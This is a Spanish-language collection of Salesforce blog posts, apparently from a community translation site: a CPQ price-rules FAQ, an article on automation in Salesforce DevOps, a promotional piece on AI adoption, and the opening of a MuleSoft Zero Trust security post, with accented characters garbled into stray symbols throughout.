鈥 Configure el operador adecuado (p. ej., 鈥淓s igual a鈥) y el valor deseado para el grupo de productos (p. ej., 鈥淐aramelos de goma鈥).

Ejemplo: Condici贸n 1

鈥 Campo: Producto: Grupo de productos

鈥 Operador: Igual

鈥 Valor: 鈥淐aramelos de goma鈥

Ejemplo: Condici贸n 2

鈥 Campo: Producto: Grupo de productos

鈥 Operador: Igual

鈥 Valor: 鈥淐aramelos de Chocolate鈥

6. Especificar acciones de fijaci贸n de precios:

鈥 Una vez que se cumplan las condiciones, defina las acciones de fijaci贸n de precios que desea aplicar a los productos en los grupos de productos espec铆ficos.

鈥 Configure las acciones de fijaci贸n de precios en funci贸n de sus requisitos, como establecer descuentos, ajustar precios o aplicar cualquier otra l贸gica de fijaci贸n de precios que desee.

Ejemplo: Precio Acci贸n 1

鈥 Si se cumple la Condici贸n 1 (Grupo de productos es igual a 鈥淐aramelos de gominola鈥), establezca un 10% de descuento en los productos afectados.

Ejemplo: Precio Acci贸n 2

鈥 Si se cumple la Condici贸n 2 (Grupo de Producto es igual a 鈥淒ulces de Chocolate鈥), establecer un precio especial en los productos afectados.

驴Cu谩les son algunas de las mejores pr谩cticas para dise帽ar y configurar reglas de precios en Salesforce CPQ?

1. Definir requisitos claros de fijaci贸n de precios:

鈥 Defina claramente sus requisitos de precios y comprenda el comportamiento de precios deseado.

鈥 Identificar las estrategias de precios, las reglas de descuento y los c谩lculos personalizados necesarios.

2. Estructura de las reglas de precios del plan:

鈥 Planifica la estructura de tus Reglas de Precios de forma l贸gica y organizada.

鈥 Dividir escenarios de precios complejos en reglas de precios m谩s peque帽as y manejables.

鈥 Esto mejora la capacidad de mantenimiento y facilita la resoluci贸n de problemas y las modificaciones.

3. Use nombres de reglas descriptivos:

鈥 Asigne nombres significativos y descriptivos a sus Reglas de precios.

鈥 Esto ayuda a identificar y comprender el prop贸sito de cada regla, especialmente cuando se trata de muchas reglas de precios.

4. Establecer orden de evaluaci贸n l贸gica:

鈥 Establezca el campo Orden de evaluaci贸n en el objeto Regla de precio de forma adecuada.

鈥 Controlar la secuencia en la que se eval煤an y aplican las Reglas de Precios.

鈥 Aseg煤rese de que el orden de evaluaci贸n se alinee con la l贸gica y los requisitos de precios previstos.

5. Probar y validar reglas de precios:

鈥 Pruebe y valide exhaustivamente sus reglas de precios con varios escenarios de prueba.

鈥 Verificar que los resultados de la fijaci贸n de precios se alineen con los resultados esperados.

鈥 Probar diferentes combinaciones de condiciones, configuraciones de productos y escenarios de precios.

6. Aproveche las condiciones avanzadas:

鈥 Utilice la funci贸n Condiciones avanzadas para implementar criterios de reglas complejos.

鈥 Combinar m煤ltiples condiciones utilizando operadores l贸gicos (AND, OR) y funciones.

鈥 Esto permite una l贸gica de reglas m谩s compleja y un control m谩s detallado.

7. Reglas de revisi贸n y actualizaci贸n peri贸dicas:

鈥 Revise peri贸dicamente sus reglas de precios para asegurarse de que se mantengan alineadas con las estrategias de precios en evoluci贸n y los requisitos comerciales.

鈥 Actualice las reglas seg煤n sea necesario para reflejar los cambios en los productos, los modelos de precios o las estrategias de descuento.

8. L贸gica de la regla de precio del documento:

鈥 Documente la l贸gica y el razonamiento detr谩s de sus Reglas de precios.

鈥 Esto sirve como referencia para futuras modificaciones y ayuda con la transferencia de conocimiento dentro del equipo.

驴Se pueden usar reglas de precios para actualizar valores de campo en un registro? Explicar.

No, las reglas de precios en Salesforce CPQ se utilizan principalmente para los c谩lculos y ajustes de precios en lugar de actualizar directamente los valores de los campos en un registro.

Si bien las reglas de precios pueden afectar los resultados y resultados de la fijaci贸n de precios, no est谩n dise帽adas para actualizar directamente los valores de campo en un registro fuera del contexto de fijaci贸n de precios.

驴Cu谩l es la diferencia entre una regla de precio y un programa de descuento?

Las reglas de precios se utilizan para definir una l贸gica de precios din谩mica y condicional, lo que permite c谩lculos y acciones complejos basados en condiciones espec铆ficas. Por otro lado, los Programas de descuento proporcionan un enfoque estandarizado para aplicar descuentos predefinidos de manera uniforme en m煤ltiples productos o escenarios de precios. Las reglas de precios ofrecen m谩s flexibilidad y opciones de personalizaci贸n, mientras que los calendarios de descuentos ofrecen una forma coherente y optimizada de gestionar los descuentos.

Expliquemos la diferencia entre una regla de precio y un programa de descuento usando un ejemplo de dulces:

Regla de precio:

鈥 Una regla de precios le permite definir acciones o ajustes de precios espec铆ficos basados en ciertas condiciones para dulces individuales o grupos de dulces.

鈥 Por ejemplo, puede crear una regla de precios que aplique un descuento del 10 % a todos los dulces de ositos de goma durante un per铆odo promocional.

鈥 Las reglas de precios brindan flexibilidad para aplicar diferentes l贸gicas de precios, descuentos o ajustes basados en diversas condiciones para dulces o grupos de dulces espec铆ficos.

Horario de descuento:

鈥 En el mismo escenario de la tienda de golosinas, se usar铆a un programa de descuentos para administrar los descuentos estandarizados que se aplican a varios dulces.

鈥 Un calendario de descuentos proporciona un enfoque consistente para aplicar descuentos predefinidos de manera uniforme.

鈥 Por ejemplo, puede crear un programa de descuento llamado "10 % de descuento" que ofrece un 10 % de descuento en todos los dulces en toda la tienda.

鈥 Los Programas de descuento ayudan a mantener precios consistentes en diferentes dulces o niveles de precios, lo que garantiza que se aplique el mismo descuento a varios productos sin necesidad de Reglas de precios individuales.

50% Me gusta VS
50% No me gusta

Continue reading

Automatizaci贸n y Salesforce DevOps: una receta para el desarrollo acelerado

Automatizaci贸n y Salesforce DevOps: una receta para el desarrollo acelerado

脷ltima actualizaci贸n el 3 de julio de 2023 por Rakesh Gupta

En el acelerado mundo empresarial actual, la eficiencia en el desarrollo de software es vital. La automatizaci贸n ha surgido como una soluci贸n clave, agilizando los procesos para aumentar la productividad y liberar la innovaci贸n. Salesforce no es inmune a estos desaf铆os y complejidades de toda la industria.

Ingrese a DevOps. DevOps se ha convertido en un elemento esencial en el desarrollo de software, incluido Salesforce. Mediante la colaboraci贸n de desarrolladores, administradores y partes interesadas, Salesforce DevOps crea un entorno perfecto para la automatizaci贸n.

La combinaci贸n de automatizaci贸n y Salesforce DevOps cosecha m煤ltiples beneficios: menos errores, preparaci贸n m谩s r谩pida para el mercado, una canalizaci贸n de lanzamiento optimizada, menos repeticiones, calidad de c贸digo superior y mecanismos de retroalimentaci贸n m谩s fuertes. Mejora la eficiencia operativa y la velocidad de implementaci贸n en el ecosistema de Salesforce, fomentando un desarrollo 谩gil.

Este art铆culo explora la intersecci贸n de la automatizaci贸n y Salesforce DevOps, los beneficios de su sinergia y formas pr谩cticas de aplicarla para un desarrollo m谩s r谩pido en sus operaciones de Salesforce. Tanto si es un profesional de Salesforce como un novato, este art铆culo ofrece informaci贸n para reforzar su enfoque de DevOps de Salesforce con la automatizaci贸n.

Descripci贸n de DevOps de Salesforce

Antes de profundizar en c贸mo se cruzan Salesforce DevOps y la automatizaci贸n, es fundamental comprender lo que implica Salesforce DevOps.

DevOps, una combinaci贸n de ' Desarrollo ' y ' Operaciones ', es un conjunto de pr谩cticas dise帽adas para fusionar el desarrollo de software, el control de calidad y las operaciones de TI en un proceso unificado y fluido. En un contexto de Salesforce , DevOps es la uni贸n de estos principios con las s贸lidas capacidades de CRM de Salesforce, con el objetivo de facilitar procesos de desarrollo e implementaci贸n m谩s fluidos y r谩pidos.

En esencia, Salesforce DevOps incorpora principios como:

  1. Integraci贸n continua y entrega continua (CI/CD),
  2. responsabilidades compartidas,
  3. Acci贸n centrada en el cliente,
  4. Cultura de colaboraci贸n.

El objetivo es crear un entorno cohesivo donde los administradores, desarrolladores y otras partes interesadas puedan trabajar en armon铆a, lo que lleva a ciclos de desarrollo m谩s cortos, tiempo de comercializaci贸n m谩s r谩pido y software de alta calidad.

Sin embargo, a pesar de las ventajas de Salesforce DevOps, los desarrolladores a menudo enfrentan desaf铆os. Si bien es un activo, las caracter铆sticas integrales y la capacidad de personalizaci贸n de Salesforce pueden complicar el proceso de desarrollo e implementaci贸n .

Los desaf铆os difieren de un equipo a otro y de un caso de uso a otro, pero estos son algunos de los m谩s comunes:

  • Las diferencias en los entornos,
  • Administrar dependencias de c贸digo,
  • Manejo de metadatos,
  • Alinear el trabajo de diferentes equipos
  • Necesidad de mantener la calidad del c贸digo
  • Estabilidad del sistema mientras entrega a gran velocidad

Aqu铆 es donde la automatizaci贸n viene al rescate. La automatizaci贸n, en esencia, es el uso de la tecnolog铆a para realizar tareas con una intervenci贸n humana reducida. Cuando se aplica a Salesforce DevOps , puede aliviar significativamente estos desaf铆os.

Las pruebas automatizadas, por ejemplo, pueden mejorar la calidad del c贸digo al identificar errores al principio del proceso de desarrollo. Las implementaciones automatizadas pueden sincronizar metadatos y c贸digo en diferentes entornos, lo que reduce los errores de implementaci贸n. Del mismo modo, la automatizaci贸n de tareas repetitivas puede liberar el tiempo de los desarrolladores, lo que les permite concentrarse en actividades que agregan m谩s valor, como el desarrollo de funciones o el dise帽o de sistemas.

Adem谩s, la automatizaci贸n fomenta un proceso de desarrollo m谩s 谩gil, lo que permite actualizaciones peri贸dicas e incrementales en lugar de implementaciones r铆gidas de Salesforce. Este aspecto acorta el ciclo de desarrollo y facilita la reversi贸n de los cambios si algo sale mal, lo que aumenta la estabilidad general del sistema.

Aprovechamiento de la automatizaci贸n para el desarrollo acelerado de Salesforce

Acelerar el desarrollo de Salesforce a trav茅s de la automatizaci贸n implica identificar tareas manuales y repetitivas, implementar herramientas y marcos de automatizaci贸n adecuados y perfeccionar los procesos para mejorar la eficiencia y reducir los cuellos de botella. Profundicemos en cada una de estas 谩reas con m谩s detalle:

Identificaci贸n de tareas manuales y repetitivas

El primer paso hacia la automatizaci贸n es reconocer qu茅 tareas est谩n ralentizando su velocidad de desarrollo.

Estos t铆picamente incluyen:

  • Revisiones de c贸digo,
  • Pruebas,
  • Despliegue,
  • Configuraci贸n,
  • Migraci贸n de datos.

Suelen implicar procesos manuales tediosos que consumen tiempo y son propensos a errores. Al identificar estas tareas, puede identificar d贸nde la automatizaci贸n proporcionar谩 el mayor beneficio y tendr谩 un impacto significativo en la velocidad y la eficiencia de su desarrollo.

Implementaci贸n de herramientas y marcos de automatizaci贸n

Una vez que haya identificado las 谩reas que podr铆an beneficiarse de la automatizaci贸n, es hora de elegir e implementar las herramientas y los marcos adecuados. Salesforce ofrece varias funciones de automatizaci贸n integradas, como Apex y Salesforce Flow .

Sin embargo, otras herramientas pueden ser m谩s adecuadas para tareas complejas, como Salesforce DX para la gesti贸n del ciclo de vida del desarrollo, o Jenkins y CircleCI para la integraci贸n y entrega continuas. Al seleccionar estas herramientas, aseg煤rese de que se alineen con las habilidades de su equipo y los requisitos espec铆ficos de su entorno de Salesforce.

Optimizaci贸n de procesos para mejorar la eficiencia

La automatizaci贸n no se trata solo de herramientas y tecnolog铆a. Tambi茅n se trata de refinar sus procesos. Revise su flujo de trabajo de desarrollo actual para identificar posibles cuellos de botella y 谩reas de mejora.

Por ejemplo:

  1. 驴C贸mo se informan y rastrean los errores?
  2. 驴Con qu茅 frecuencia se realizan las implementaciones y c贸mo se programan?
  3. 驴C贸mo se recopilan los comentarios y c贸mo se act煤a en consecuencia?

Simplificar estos procesos puede mejorar dr谩sticamente la eficiencia de su equipo, permiti茅ndole aprovechar al m谩ximo sus esfuerzos de automatizaci贸n.

Vale la pena mencionar que los beneficios de la automatizaci贸n van m谩s all谩 de acelerar el desarrollo. La automatizaci贸n tambi茅n puede mejorar la calidad del c贸digo al detectar errores temprano a trav茅s de pruebas automatizadas. Puede reducir los errores de implementaci贸n al sincronizar el c贸digo en diferentes entornos.

Y al liberar a los desarrolladores de las tareas rutinarias, les permite concentrarse m谩s en el desarrollo de caracter铆sticas y el dise帽o del sistema, fomentando as铆 la innovaci贸n y mejorando el valor entregado a los usuarios finales.

Pruebas automatizadas para el desarrollo acelerado de Salesforce

Las pruebas son un componente crucial de cualquier ciclo de vida de desarrollo, y su importancia se multiplica para acelerar el desarrollo de Salesforce. Las pruebas peri贸dicas y exhaustivas ayudan a identificar errores y problemas desde el principio, lo que reduce el riesgo de reparaciones costosas y lentas en el futuro. Asegura la calidad y la confiabilidad de la aplicaci贸n, lo que a su vez contribuye a mejorar las experiencias de los usuarios y los resultados comerciales.

La automatizaci贸n puede potenciar este proceso de prueba. Las pruebas automatizadas implican el uso de herramientas de software para ejecutar pruebas y comparar los resultados reales con los resultados esperados. La implementaci贸n de una estrategia de prueba automatizada para las aplicaciones de Salesforce puede acelerar dr谩sticamente el proceso de desarrollo, lo que garantiza implementaciones m谩s r谩pidas, eficientes y confiables con menos errores.

Existen numerosas herramientas disponibles para pruebas automatizadas en Salesforce. Apex proporciona soporte integrado para pruebas unitarias, mientras que herramientas como Selenium, Provar y AssureClick pueden automatizar las pruebas de IU. Jest es una excelente opci贸n para probar Lightning Web Components (LWC). Al seleccionar una herramienta, considere las necesidades espec铆ficas de su aplicaci贸n, la experiencia de su equipo y la complejidad y frecuencia de sus requisitos de prueba.

Seguir las mejores pr谩cticas es esencial para aprovechar todo el potencial de las pruebas automatizadas. Estas son algunas de las mejores pr谩cticas para pruebas automatizadas eficientes y completas en el desarrollo de Salesforce:

  • Apunte a una alta cobertura de prueba : aseg煤rese de probar todas las partes de su aplicaci贸n. Salesforce requiere una cobertura de c贸digo m铆nima del 75 %, pero apuntar a una mayor cobertura puede brindar m谩s confianza en la confiabilidad de la aplicaci贸n.
  • Cree pruebas repetibles y aut贸nomas : las pruebas deben poder ejecutarse en cualquier entorno y no deben basarse en datos de pruebas anteriores. Esto garantiza que cada prueba valide una funci贸n espec铆fica de forma independiente.
  • Mantenga sus conjuntos de pruebas : a medida que su aplicaci贸n evolucione, sus pruebas tambi茅n deber铆an hacerlo. Revise y actualice regularmente sus pruebas para asegurarse de que reflejen con precisi贸n el estado actual de su aplicaci贸n.
  • Implemente diferentes niveles de prueba : combine pruebas unitarias, pruebas de integraci贸n y pruebas de interfaz de usuario para validar todos los aspectos de su aplicaci贸n. Cada nivel de prueba proporciona una perspectiva diferente sobre la funcionalidad de la aplicaci贸n.
  • Priorizar la legibilidad de la prueba : las pruebas a menudo sirven como documentaci贸n, explicando lo que se supone que debe hacer una parte del c贸digo. Aseg煤rese de que sus pruebas est茅n bien estructuradas y claramente escritas para que sean f谩ciles de entender para los dem谩s.
  • Incorpore las pruebas al principio del proceso de desarrollo : no espere hasta el final del ciclo de desarrollo para comenzar las pruebas. La incorporaci贸n de pruebas de manera temprana y frecuente le permite detectar y solucionar problemas r谩pidamente.

Integraci贸n e implementaci贸n continuas con automatizaci贸n

La integraci贸n continua y la implementaci贸n continua (CI/CD) forman un pilar central de Salesforce DevOps. CI/CD est谩 dise帽ado para reducir errores y acelerar el desarrollo a trav茅s de la integraci贸n continua de c贸digo y procesos de implementaci贸n automatizados y consistentes.

En el contexto de Salesforce, CI fusiona peri贸dicamente los cambios de c贸digo en un repositorio compartido, a menudo varias veces al d铆a. Cada integraci贸n se verifica autom谩ticamente mediante la creaci贸n de la aplicaci贸n y la ejecuci贸n de pruebas, lo que garantiza que los nuevos cambios se integren perfectamente con el c贸digo existente y no introduzcan errores.

Por otro lado, CD implementa autom谩ticamente esos cambios en la producci贸n, lo que garantiza que las nuevas caracter铆sticas, configuraciones y mejoras lleguen a los usuarios finales lo m谩s r谩pido posible. En Salesforce, CD puede implicar la implementaci贸n de cambios en diferentes entornos, como entornos de desarrollo, prueba, ensayo y producci贸n.

La automatizaci贸n es clave para lograr procesos impecables de CI/CD de Salesforce. A trav茅s de la automatizaci贸n, puede optimizar y estandarizar los pasos involucrados en:

  • Creaci贸n, prueba e implementaci贸n de aplicaciones de Salesforce,
  • Reducir el potencial de error humano
  • Acelerar el ciclo de desarrollo general.

La automatizaci贸n del proceso de compilaci贸n garantiza que los cambios en el c贸digo se integren y validen de manera constante. Las pruebas automatizadas, como comentamos anteriormente, verifican la integridad y la calidad del nuevo c贸digo. La automatizaci贸n del proceso de implementaci贸n ayuda a sincronizar el c贸digo y los cambios de configuraci贸n en diferentes entornos, lo que garantiza que todos los equipos de DevOps trabajen con la versi贸n m谩s reciente y precisa de la aplicaci贸n.

Control de versiones y automatizaci贸n de la gesti贸n de cambios

En el desarrollo de Salesforce, el control de versiones y la gesti贸n de cambios son fundamentales para mantener la integridad, coherencia y calidad de su aplicaci贸n.

El control de versiones, una parte integral del desarrollo de software, implica administrar y rastrear diferentes versiones de su base de c贸digo. Le permite ver los cambios a lo largo del tiempo, volver a las versiones anteriores cuando sea necesario y administrar el c贸digo de varios desarrolladores al mismo tiempo.

La gesti贸n de cambios se refiere a la gesti贸n y el seguimiento de los cambios del sistema, incluidos los cambios de configuraci贸n, las modificaciones de c贸digo y las implementaciones de nuevas funciones.

La automatizaci贸n de estos procesos puede mejorar su eficiencia y confiabilidad en el desarrollo de Salesforce.

  1. El control de versiones automatizado permite una integraci贸n de c贸digo m谩s fluida de diferentes desarrolladores, lo que reduce el riesgo de conflictos y errores.
  2. La gesti贸n de cambios automatizada asegura que todas las modificaciones a su sistema sean rastreadas y verificadas con precisi贸n, mejorando la responsabilidad y facilitando el diagn贸stico de cualquier problema que surja.

Varias herramientas pueden ayudar a automatizar el control de versiones y la gesti贸n de cambios en Salesforce. Los sistemas de control de versiones (VCS) como Git permiten un control de versiones efectivo. Facilita el seguimiento de los cambios en la base del c贸digo, lo que ayuda a mantener la integridad del c贸digo.

Las herramientas de DevOps como Copado o Gearset pueden ayudar a automatizar el seguimiento y la implementaci贸n de cambios en diferentes entornos para la gesti贸n de cambios. Brindan una visibilidad integral de su historial de cambios, lo que le permite administrar los cambios de manera m谩s efectiva y mantener la estabilidad de su aplicaci贸n.

Automatizaci贸n de la supervisi贸n y el tratamiento de errores

En el 谩mbito vertiginoso del desarrollo de Salesforce, el papel de la automatizaci贸n se extiende m谩s all谩 de la creaci贸n, prueba e implementaci贸n. El monitoreo automatizado y el manejo de errores son igualmente importantes para mantener la salud de la aplicaci贸n y corregir r谩pidamente cualquier problema.

El monitoreo automatizado implica el uso de herramientas para realizar un seguimiento constante del rendimiento, el uso y el estado general de sus aplicaciones de Salesforce. Este enfoque proactivo permite a los equipos de desarrollo identificar y abordar posibles problemas antes de que afecten a los usuarios.

El manejo proactivo de errores va de la mano con el monitoreo automatizado. En lugar de esperar a que se informen los problemas, el manejo proactivo de errores implica el uso de sistemas automatizados para identificar y, a menudo, resolver los problemas tan pronto como ocurran. Las notificaciones de error automatizadas aseguran que su equipo est茅 al tanto de cualquier problema al instante, lo que permite una respuesta r谩pida, minimiza el tiempo de inactividad y reduce la posibilidad de errores costosos.

La implementaci贸n de estas herramientas de automatizaci贸n en Salesforce DevOps implica el uso estrat茅gico de recursos como Monitoreo de eventos de Salesforce, que proporciona un flujo de eventos de auditor铆a de aplicaciones de su organizaci贸n, y herramientas de Monitoreo y advertencia de errores, que pueden notificarle autom谩ticamente sobre errores o excepciones.

Conclusi贸n

La automatizaci贸n combinada con las pr谩cticas de Salesforce DevOps ofrece una poderosa estrategia para acelerar el desarrollo y mejorar la calidad del software. Es una receta para el 茅xito en el vertiginoso panorama digital actual.

Para implementar la automatizaci贸n en su desarrollo de Salesforce, comience por identificar las tareas repetitivas que podr铆an automatizarse. Luego, implemente herramientas adecuadas para tareas como integraci贸n continua, pruebas automatizadas, control de versiones y monitoreo de aplicaciones. Agilice cualquier proceso manual junto con la implementaci贸n de estas herramientas, creando un flujo de trabajo de desarrollo eficiente y efectivo.

La adopci贸n de la automatizaci贸n en Salesforce DevOps acelera el desarrollo y refuerza la confiabilidad y el valor de sus aplicaciones. A medida que el ecosistema de Salesforce contin煤a evolucionando, el papel de la automatizaci贸n crecer谩 a煤n m谩s, dando forma al futuro del desarrollo de Salesforce.

Este art铆culo fue escrito por Sam Hops. Es redactora de contenido para una revista digital que cubre temas relacionados con el dise帽o, el comercio electr贸nico, el marketing digital y el esp铆ritu empresarial. Sam es un apasionado de todo lo relacionado con el marketing digital, pero tiene un inter茅s particular en el dise帽o gr谩fico, el SEO y las redes sociales.

Evaluaci贸n formativa:

隆Quiero saber de ti!

驴Qu茅 es una cosa que aprendiste de esta publicaci贸n? 驴C贸mo imagina aplicar este nuevo conocimiento en el mundo real? Si茅ntase libre de compartir en los comentarios a continuaci贸n.

Continue reading

3 pasos para la adopci贸n estrat茅gica de IA

3 pasos para la adopci贸n estrat茅gica de IA

En el mundo empresarial actual, que cambia r谩pidamente, la IA tiene el potencial de transformar las industrias y desbloquear oportunidades sin precedentes. Sin embargo, muchos l铆deres de la industria no est谩n seguros de c贸mo adoptar esta adopci贸n dentro de sus organizaciones. Se preguntan si reemplazar谩 las capacidades humanas o agregar谩 complejidad sin brindar beneficios tangibles.

Imagine las posibilidades de una adopci贸n estrat茅gica de IA. Un asombroso 79% de las empresas ya han experimentado una reducci贸n significativa de costos a trav茅s de la implementaci贸n. Pero, sin una estrategia bien definida adaptada a sus necesidades 煤nicas, las empresas corren el riesgo de perderse los beneficios de estas herramientas transformadoras.

Comience con AI Cloud

Los servicios profesionales de Salesforce pueden ayudarlo a establecer la base adecuada para el 茅xito con nuestro nuevo paquete, AI Coach.

驴Est谩 listo para navegar por el complejo mundo de la IA y aprender c贸mo puede integrarse en su negocio? Profundicemos y descubramos tres pasos pr谩cticos para la adopci贸n e implementaci贸n exitosas de IA , y la importancia de usar esta tecnolog铆a de una manera en la que pueda confiar con AI Cloud .

1. Eval煤e su preparaci贸n para la adopci贸n de IA

Una de las preguntas que suelen hacer los clientes cuando se embarcan en su viaje de IA es: "驴Por d贸nde empiezo?" Con el gran potencial de la tecnolog铆a de IA generativa , los l铆deres de la industria pueden sentirse abrumados o inseguros sobre cu谩l es el mejor camino a seguir. Para navegar este mar de posibilidades, es crucial hacer las preguntas correctas y evaluar la preparaci贸n de su organizaci贸n para adoptar la IA.

  • Identifique el valor empresarial : analice sus procesos, las interacciones con los clientes y los activos de datos para identificar las 谩reas en las que la IA puede crear el mayor valor. Podr谩 concentrar sus esfuerzos en 谩reas de alto impacto que ofrecen retornos 贸ptimos.
  • Visualice c贸mo aprovechar el poder de la IA : Considere c贸mo la IA puede potenciar los objetivos de su empresa. Explore casos de uso, aplicaciones y resultados deseados espec铆ficos para crear una visi贸n convincente.
  • Eval煤e su preparaci贸n : luego, confirme que su organizaci贸n est谩 lista para adoptar la IA. Analice su infraestructura tecnol贸gica, capacidades de datos y habilidades de la fuerza laboral para identificar brechas y 谩reas de mejora. Determine si tiene los recursos, la experiencia y los sistemas de soporte necesarios para implementar y administrar estas soluciones.

Al tomarse el tiempo para evaluar la preparaci贸n, puede abordar las barreras comunes para una adopci贸n exitosa de la IA. Este proceso le permite tomar decisiones informadas, dividir recursos y desarrollar una hoja de ruta realista.

2. Cree una prueba de tecnolog铆a

Para garantizar una integraci贸n exitosa de la IA en su organizaci贸n, debe desarrollar un plan pr谩ctico que aborde las preguntas comerciales clave . Un componente crucial de este plan es crear una prueba de tecnolog铆a , que determina si la soluci贸n o tecnolog铆a propuesta se integrar谩 en su entorno existente y, por lo tanto, demostrar谩 compatibilidad.

Hay varios pasos importantes para ayudarlo a evaluar la viabilidad, demostrar las capacidades del producto y validar la relevancia de los casos de uso. Al seguir estos pasos, puede posicionar a su equipo para el 茅xito y obtener el apoyo de las partes interesadas para la adopci贸n de IA.

  • Identifique casos de uso : perfeccione los casos de uso de IA mediante la recopilaci贸n de informaci贸n de toda su organizaci贸n. Conc茅ntrese en las 谩reas donde la IA puede tener el mayor impacto y alinee sus iniciativas con los objetivos de la empresa.
  • Implemente la prueba de tecnolog铆a de AI Cloud : eval煤e la viabilidad implementando herramientas de IA en un entorno controlado. Pruebe el rendimiento, la escalabilidad y la integraci贸n con los sistemas existentes para abordar cualquier problema desde el principio y garantizar una transici贸n sin problemas.
  • Demuestre las capacidades del producto : Muestre la transformaci贸n potencial a trav茅s de escenarios de pr谩ctica o proyectos piloto. Obtenga la aceptaci贸n y el apoyo de las partes interesadas al ilustrar c贸mo la IA aborda desaf铆os espec铆ficos y brinda los resultados deseados.
  • Valide el valor comercial : antes de la implementaci贸n, confirme la relevancia de sus casos de uso. Pruebe los beneficios no realizados, como mejoras en la eficiencia, mejores experiencias de los clientes y una mejor toma de decisiones, asegur谩ndose de que sus iniciativas de IA se alineen con sus objetivos comerciales.

Al crear una prueba integral de la tecnolog铆a, sienta las bases para una adopci贸n exitosa de la IA. Esta ser谩 su hoja de ruta para navegar por los posibles desaf铆os y aprovechar al m谩ximo las oportunidades futuras.

Impulse la transformaci贸n continua con
La Oficina de Innovaci贸n Continua

Los servicios profesionales de Salesforce pueden ayudarlo a elevar sus capacidades para obtener el m谩ximo valor de su inversi贸n en Salesforce.

3. Transformar la visi贸n en acci贸n

Si bien la planificaci贸n es esencial, es crucial conectar los puntos entre la visi贸n y la ejecuci贸n. As铆 es como puede transformar su plan bien elaborado en una realidad, superando futuros escollos en el camino:

  • Involucrar a diversas partes interesadas : involucrar una variedad de perspectivas e intereses a trav茅s de una colaboraci贸n inclusiva. Busque aportes de empleados, clientes y socios para dar forma a la estrategia de implementaci贸n.
  • Promueva la transparencia : mantenga su plan visible, claro y actualizado. Comparta el progreso y los hitos para fomentar la confianza, la propiedad colectiva y la responsabilidad.
  • Adopte una mentalidad de aprendizaje : mant茅ngase abierto a nuevos conocimientos y perfeccione su plan a medida que avanza.
  • Tome decisiones informadas m谩s f谩cilmente : proporcione estrategias pr谩cticas y una visi贸n clara para garantizar que sus elecciones est茅n alineadas con los resultados deseados.
  • Capacite a su gente : reconozca que el poder de la IA radica en las capacidades colectivas de su fuerza laboral. Aproveche sus conocimientos, habilidades y creatividad para desbloquear todo el potencial de la IA e impulsar un cambio significativo.

Recuerde que el verdadero poder de la IA no radica en la tecnolog铆a en s铆, sino en su gente. Al seguir estas pautas, puede cerrar la brecha entre la visi贸n y la acci贸n, transformando las aspiraciones de su organizaci贸n en resultados concretos.

Aproveche las oportunidades que se avecinan

Abraza el futuro con confianza. Descubra el poder transformador de la IA con AI Coach de Salesforce Professional Services . Nuestro equipo de expertos lo ayudar谩 a evaluar la preparaci贸n para la IA de su organizaci贸n. Desde la adopci贸n de IA hasta la implementaci贸n de pruebas de tecnolog铆a que demuestren el valor comercial y la planificaci贸n estrat茅gica de c贸mo puede establecer la base adecuada para el 茅xito a largo plazo con la Fase 0.

Juntos, navegaremos las complejidades de la implementaci贸n de IA. Al mismo tiempo, nos aseguraremos de que sus iniciativas funcionen hacia sus objetivos comerciales. D茅 el primer paso para liberar todo el potencial de la IA en su organizaci贸n. P贸ngase en contacto con los servicios profesionales de Salesforce hoy mismo.

Continue reading

Seguridad Zero Trust para tus APIs usando MuleSoft 鈽侊笍

Seguridad Zero Trust para tus APIs usando MuleSoft 鈽侊笍

Esta es una traducci贸n que desde EGA Futura ofrecemos como cortes铆a a toda la Ohana y comunidad de programadores , consultores , administradores y arquitectos de Salesforce para toda Iberoam茅rica .

El enlace a la publicaci贸n original, lo encontrar谩s al final de este art铆culo.

Seguridad Zero Trust para sus API con MuleSoft | Blog de desarrolladores de Salesforce

Roma no se construy贸 en un d铆a… pero casi se arruin贸 en una noche. Eso es lo que tienen los imperios, son fr谩giles. Al igual que la confianza. Podemos extender a煤n m谩s esta analog铆a a nuestra arquitectura empresarial; se necesita mucho tiempo y un gran esfuerzo para construir una organizaci贸n exitosa y ganarse la confianza del cliente, pero un percance de seguridad puede reducir todos los escombros de sus esfuerzos.


En 2022, todos escuchamos sobre la filtraci贸n del juego GTA 6 justo antes de su fecha de lanzamiento. Esta filtraci贸n fue lo suficientemente grande como para poner en problemas financieros al editor del juego, y hubo especulaciones de que una persona interna, como un empleado, estaba involucrada. Entonces la pregunta es: "驴A qui茅n debemos confiar con la seguridad?" La seguridad es tan fuerte como el eslab贸n m谩s d茅bil.

Y la respuesta es: 鈥淣o conf铆es en nadie鈥, y eso es lo que nos lleva a Zero Trust Security (ZTS) .

ZTS es un marco arquitect贸nico que tiene como objetivo proteger a las organizaciones de amenazas de seguridad, ataques y violaciones de datos al cumplir con los protocolos de seguridad en cada punto de acceso.

Antes de ZTS, la seguridad basada en el per铆metro era el enfoque popular. En la seguridad perimetral, autenticamos y autorizamos a la entidad solo a nivel perif茅rico mediante firewalls, redes privadas virtuales, etc. Una vez que la entidad obtiene acceso, puede acceder a todos los recursos. El movimiento lateral no autorizado ha sido una de las principales preocupaciones en la seguridad perimetral.

Por el contrario, ZTS impone autenticaci贸n y autorizaci贸n en cada punto de entrada. En general, podemos aplicar ZTS a aplicaciones empresariales, aplicaciones nativas de la nube, API, etc. En esta publicaci贸n de blog, nos centraremos principalmente en implementar ZTS para API y explorar lo que MuleSoft tiene para ofrecer en lo que respecta a Zero Trust Security.

Principios b谩sicos de ZTS

Todo el concepto de ZTS se basa en los siguientes cuatro principios b谩sicos:

  • No conf铆e en nadie y verifique siempre : independientemente de la persona (cliente, director ejecutivo, desarrollador, etc.), autenticamos y autorizamos su acceso en cada etapa. Si hay m煤ltiples puntos de entrada para obtener acceso a un recurso en particular, debemos aplicar la validaci贸n en cada punto de entrada. Utilizamos Gesti贸n de Identidad y Acceso (IAM) y autenticaci贸n multifactor (MFA), y aplicamos pol铆ticas de seguridad.
  • M铆nimos privilegios y denegaci贸n predeterminada : De forma predeterminada, se denegar谩 el acceso a todos los recursos. Una vez que la entidad est谩 autenticada y autorizada, seg煤n la credencial, podemos otorgar acceso con los privilegios m铆nimos. Necesitamos asegurarnos de que estamos autorizando solo los recursos esenciales. Podemos controlar el acceso para diferentes roles utilizando el modelo de acceso basado en roles y modificar los privilegios en consecuencia.
